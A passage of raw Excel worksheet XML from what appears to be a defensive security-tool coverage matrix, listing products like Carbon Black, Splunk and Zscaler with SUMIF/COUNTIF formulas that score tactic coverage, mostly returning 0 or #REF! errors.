    <col min="10" max="10" width="14.3984375" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="12" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="10" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="23" bestFit="1" customWidth="1"/>
    <col min="14" max="14" width="24.86328125" bestFit="1" customWidth="1"/>
    <col min="15" max="15" width="14.265625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:17" ht="23.25" x14ac:dyDescent="0.45">
      <c r="A1" s="48" t="s">
        <v>276</v>
      </c>
      <c r="B1" s="49" t="str">
        <f ca="1">CELL("contents",Security_Tools!$A1)</f>
        <v>Carbon Black Response</v>
      </c>
      <c r="C1" s="49" t="str">
        <f ca="1">CELL("contents",Security_Tools!$A2)</f>
        <v>Nessus Security Center</v>
      </c>
      <c r="D1" s="49" t="str">
        <f ca="1">CELL("contents",Security_Tools!$A3)</f>
        <v>Zscaler</v>
      </c>
      <c r="E1" s="49" t="str">
        <f ca="1">CELL("contents",Security_Tools!$A4)</f>
        <v>AMP</v>
      </c>
      <c r="F1" s="49" t="str">
        <f ca="1">CELL("contents",Security_Tools!$A5)</f>
        <v>CyberArk</v>
      </c>
      <c r="G1" s="49" t="str">
        <f ca="1">CELL("contents",Security_Tools!$A6)</f>
        <v>Suricata</v>
      </c>
      <c r="H1" s="49" t="str">
        <f ca="1">CELL("contents",Security_Tools!$A7)</f>
        <v>FirePOWER</v>
      </c>
      <c r="I1" s="49" t="str">
        <f ca="1">CELL("contents",Security_Tools!$A8)</f>
        <v>Gigamon</v>
      </c>
      <c r="J1" s="49" t="str">
        <f ca="1">CELL("contents",Security_Tools!$A9)</f>
        <v>Vormetric</v>
      </c>
      <c r="K1" s="49" t="str">
        <f ca="1">CELL("contents",Security_Tools!$A10)</f>
        <v>Imperva</v>
      </c>
      <c r="L1" s="49" t="str">
        <f ca="1">CELL("contents",Security_Tools!$A11)</f>
        <v>Splunk</v>
      </c>
      <c r="M1" s="49" t="str">
        <f ca="1">CELL("contents",Security_Tools!$A12)</f>
        <v>Digital Guardian</v>
      </c>
      <c r="N1" s="49" t="str">
        <f ca="1">CELL("contents",Security_Tools!$A13)</f>
        <v xml:space="preserve">Contrast Security </v>
      </c>
      <c r="O1" s="49" t="str">
        <f ca="1">CELL("contents",Security_Tools!$A14)</f>
        <v>Mimecast</v>
      </c>
      <c r="P1" s="49">
        <f ca="1">CELL("contents",Security_Tools!$A15)</f>
        <v>0</v>
      </c>
      <c r="Q1" s="49">
        <f ca="1">CELL("contents",Security_Tools!$A16)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2" spans="1:17" ht="23.25" x14ac:dyDescent="0.7">
      <c r="A2" s="27" t="s">
        <v>0</v>
      </c>
      <c r="B2" s="28">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$250,"*"&amp;'DS-Tool-Tactic-Coverage'!A2&amp;"*",'Detailed Techniques'!$L$2:$L$250)/(COUNTIF('Detailed Techniques'!$B$2:$B$250,"*"&amp;'DS-Tool-Tactic-Coverage'!A2&amp;"*"))</f>
        <v>0</v>
      </c>
      <c r="C2" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A2&amp;"*",'Detailed Techniques'!$N$2:$N$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A2&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="D2" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A2&amp;"*",'Detailed Techniques'!$P$2:$P$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A2&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="E2" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A2&amp;"*",'Detailed Techniques'!$R$2:$R$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A2&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="F2" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A2&amp;"*",'Detailed Techniques'!$T$2:$T$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A2&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="G2" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A2&amp;"*",'Detailed Techniques'!$V$2:$V$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A2&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="H2" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A2&amp;"*",'Detailed Techniques'!$X$2:$X$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A2&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="I2" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!B2&amp;"*",'Detailed Techniques'!$X$2:$X$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!B2&amp;"*"))</f>
        <v>#DIV/0!</v>
      </c>
    </row>
    <row r="3" spans="1:17" ht="23.25" x14ac:dyDescent="0.7">
      <c r="A3" s="27" t="s">
        <v>1</v>
      </c>
      <c r="B3" s="28">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$250,"*"&amp;'DS-Tool-Tactic-Coverage'!A3&amp;"*",'Detailed Techniques'!$L$2:$L$250)/(COUNTIF('Detailed Techniques'!$B$2:$B$250,"*"&amp;'DS-Tool-Tactic-Coverage'!A3&amp;"*"))</f>
        <v>0</v>
      </c>
      <c r="C3" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A3&amp;"*",'Detailed Techniques'!$N$2:$N$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A3&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="D3" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A3&amp;"*",'Detailed Techniques'!$P$2:$P$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A3&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="E3" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A3&amp;"*",'Detailed Techniques'!$R$2:$R$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A3&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="F3" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A3&amp;"*",'Detailed Techniques'!$T$2:$T$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A3&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="G3" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A3&amp;"*",'Detailed Techniques'!$V$2:$V$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A3&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="H3" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A3&amp;"*",'Detailed Techniques'!$X$2:$X$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A3&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="I3" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!B3&amp;"*",'Detailed Techniques'!$X$2:$X$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!B3&amp;"*"))</f>
        <v>#DIV/0!</v>
      </c>
    </row>
    <row r="4" spans="1:17" ht="23.25" x14ac:dyDescent="0.7">
      <c r="A4" s="27" t="s">
        <v>2</v>
      </c>
      <c r="B4" s="28">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$250,"*"&amp;'DS-Tool-Tactic-Coverage'!A4&amp;"*",'Detailed Techniques'!$L$2:$L$250)/(COUNTIF('Detailed Techniques'!$B$2:$B$250,"*"&amp;'DS-Tool-Tactic-Coverage'!A4&amp;"*"))</f>
        <v>0</v>
      </c>
      <c r="C4" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A4&amp;"*",'Detailed Techniques'!$N$2:$N$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A4&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="D4" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A4&amp;"*",'Detailed Techniques'!$P$2:$P$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A4&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="E4" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A4&amp;"*",'Detailed Techniques'!$R$2:$R$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A4&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="F4" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A4&amp;"*",'Detailed Techniques'!$T$2:$T$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A4&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="G4" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A4&amp;"*",'Detailed Techniques'!$V$2:$V$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A4&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="H4" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A4&amp;"*",'Detailed Techniques'!$X$2:$X$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A4&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="I4" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!B4&amp;"*",'Detailed Techniques'!$X$2:$X$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!B4&amp;"*"))</f>
        <v>#DIV/0!</v>
      </c>
    </row>
    <row r="5" spans="1:17" ht="23.25" x14ac:dyDescent="0.7">
      <c r="A5" s="27" t="s">
        <v>3</v>
      </c>
      <c r="B5" s="28">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$250,"*"&amp;'DS-Tool-Tactic-Coverage'!A5&amp;"*",'Detailed Techniques'!$L$2:$L$250)/(COUNTIF('Detailed Techniques'!$B$2:$B$250,"*"&amp;'DS-Tool-Tactic-Coverage'!A5&amp;"*"))</f>
        <v>0</v>
      </c>
      <c r="C5" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A5&amp;"*",'Detailed Techniques'!$N$2:$N$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A5&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="D5" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A5&amp;"*",'Detailed Techniques'!$P$2:$P$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A5&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="E5" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A5&amp;"*",'Detailed Techniques'!$R$2:$R$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A5&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="F5" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A5&amp;"*",'Detailed Techniques'!$T$2:$T$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A5&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="G5" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A5&amp;"*",'Detailed Techniques'!$V$2:$V$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A5&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="H5" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A5&amp;"*",'Detailed Techniques'!$X$2:$X$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A5&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="I5" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!B5&amp;"*",'Detailed Techniques'!$X$2:$X$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!B5&amp;"*"))</f>
        <v>#DIV/0!</v>
      </c>
    </row>
    <row r="6" spans="1:17" ht="23.25" x14ac:dyDescent="0.7">
      <c r="A6" s="27" t="s">
        <v>4</v>
      </c>
      <c r="B6" s="28">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$250,"*"&amp;'DS-Tool-Tactic-Coverage'!A6&amp;"*",'Detailed Techniques'!$L$2:$L$250)/(COUNTIF('Detailed Techniques'!$B$2:$B$250,"*"&amp;'DS-Tool-Tactic-Coverage'!A6&amp;"*"))</f>
        <v>0</v>
      </c>
      <c r="C6" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A6&amp;"*",'Detailed Techniques'!$N$2:$N$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A6&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="D6" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A6&amp;"*",'Detailed Techniques'!$P$2:$P$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A6&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="E6" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A6&amp;"*",'Detailed Techniques'!$R$2:$R$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A6&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="F6" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A6&amp;"*",'Detailed Techniques'!$T$2:$T$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A6&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="G6" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A6&amp;"*",'Detailed Techniques'!$V$2:$V$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A6&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="H6" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A6&amp;"*",'Detailed Techniques'!$X$2:$X$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A6&amp;"*"))</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="7" spans="1:17" ht="23.25" x14ac:dyDescent="0.7">
      <c r="A7" s="27" t="s">
        <v>5</v>
      </c>
      <c r="B7" s="28">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$250,"*"&amp;'DS-Tool-Tactic-Coverage'!A7&amp;"*",'Detailed Techniques'!$L$2:$L$250)/(COUNTIF('Detailed Techniques'!$B$2:$B$250,"*"&amp;'DS-Tool-Tactic-Coverage'!A7&amp;"*"))</f>
        <v>0</v>
      </c>
      <c r="C7" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A7&amp;"*",'Detailed Techniques'!$N$2:$N$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A7&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="D7" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A7&amp;"*",'Detailed Techniques'!$P$2:$P$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A7&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="E7" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A7&amp;"*",'Detailed Techniques'!$R$2:$R$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A7&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="F7" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A7&amp;"*",'Detailed Techniques'!$T$2:$T$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A7&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="G7" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A7&amp;"*",'Detailed Techniques'!$V$2:$V$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A7&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="H7" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A7&amp;"*",'Detailed Techniques'!$X$2:$X$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A7&amp;"*"))</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="8" spans="1:17" ht="23.25" x14ac:dyDescent="0.7">
      <c r="A8" s="27" t="s">
        <v>6</v>
      </c>
      <c r="B8" s="28">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$250,"*"&amp;'DS-Tool-Tactic-Coverage'!A8&amp;"*",'Detailed Techniques'!$L$2:$L$250)/(COUNTIF('Detailed Techniques'!$B$2:$B$250,"*"&amp;'DS-Tool-Tactic-Coverage'!A8&amp;"*"))</f>
        <v>0</v>
      </c>
      <c r="C8" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A8&amp;"*",'Detailed Techniques'!$N$2:$N$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A8&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="D8" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A8&amp;"*",'Detailed Techniques'!$P$2:$P$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A8&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="E8" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A8&amp;"*",'Detailed Techniques'!$R$2:$R$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A8&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="F8" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A8&amp;"*",'Detailed Techniques'!$T$2:$T$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A8&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="G8" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A8&amp;"*",'Detailed Techniques'!$V$2:$V$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A8&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="H8" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A8&amp;"*",'Detailed Techniques'!$X$2:$X$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A8&amp;"*"))</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="9" spans="1:17" ht="23.25" x14ac:dyDescent="0.7">
      <c r="A9" s="27" t="s">
        <v>7</v>
      </c>
      <c r="B9" s="28">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$250,"*"&amp;'DS-Tool-Tactic-Coverage'!A9&amp;"*",'Detailed Techniques'!$L$2:$L$250)/(COUNTIF('Detailed Techniques'!$B$2:$B$250,"*"&amp;'DS-Tool-Tactic-Coverage'!A9&amp;"*"))</f>
        <v>0</v>
      </c>
      <c r="C9" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A9&amp;"*",'Detailed Techniques'!$N$2:$N$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A9&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="D9" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A9&amp;"*",'Detailed Techniques'!$P$2:$P$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A9&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="E9" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A9&amp;"*",'Detailed Techniques'!$R$2:$R$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A9&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="F9" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A9&amp;"*",'Detailed Techniques'!$T$2:$T$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A9&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="G9" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A9&amp;"*",'Detailed Techniques'!$V$2:$V$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A9&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="H9" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A9&amp;"*",'Detailed Techniques'!$X$2:$X$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A9&amp;"*"))</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="10" spans="1:17" ht="23.25" x14ac:dyDescent="0.7">
      <c r="A10" s="27" t="s">
        <v>8</v>
      </c>
      <c r="B10" s="28">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$250,"*"&amp;'DS-Tool-Tactic-Coverage'!A10&amp;"*",'Detailed Techniques'!$L$2:$L$250)/(COUNTIF('Detailed Techniques'!$B$2:$B$250,"*"&amp;'DS-Tool-Tactic-Coverage'!A10&amp;"*"))</f>
        <v>0</v>
      </c>
      <c r="C10" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A10&amp;"*",'Detailed Techniques'!$N$2:$N$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A10&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="D10" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A10&amp;"*",'Detailed Techniques'!$P$2:$P$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A10&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="E10" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A10&amp;"*",'Detailed Techniques'!$R$2:$R$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A10&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="F10" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A10&amp;"*",'Detailed Techniques'!$T$2:$T$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A10&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="G10" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A10&amp;"*",'Detailed Techniques'!$V$2:$V$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A10&amp;"*"))</f>
        <v>#REF!</v>
      </c>
      <c r="H10" s="28" t="e">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A10&amp;"*",'Detailed Techniques'!$X$2:$X$170)/(COUNTIF('Detailed Techniques'!$B$2:$B$170,"*"&amp;'DS-Tool-Tactic-Coverage'!A10&amp;"*"))</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="11" spans="1:17" ht="23.25" x14ac:dyDescent="0.7">
      <c r="A11" s="27" t="s">
        <v>9</v>
      </c>
      <c r="B11" s="28">
        <f>SUMIF('Detailed Techniques'!$B$2:$B$250,"*"&amp;'DS-Tool-Tactic-Coverage'!A11&amp;"*",'Detailed Techniques'!$L$2:$L$250)/(COUNTIF('Detailed Techniques'!$B$2:$B$250,"*"&amp;'DS-Tool-Tactic-Coverage'!A11&amp;"*"))</f>
        <v>0</v>
      </c>
      <c r="C11" s="28" t="e">
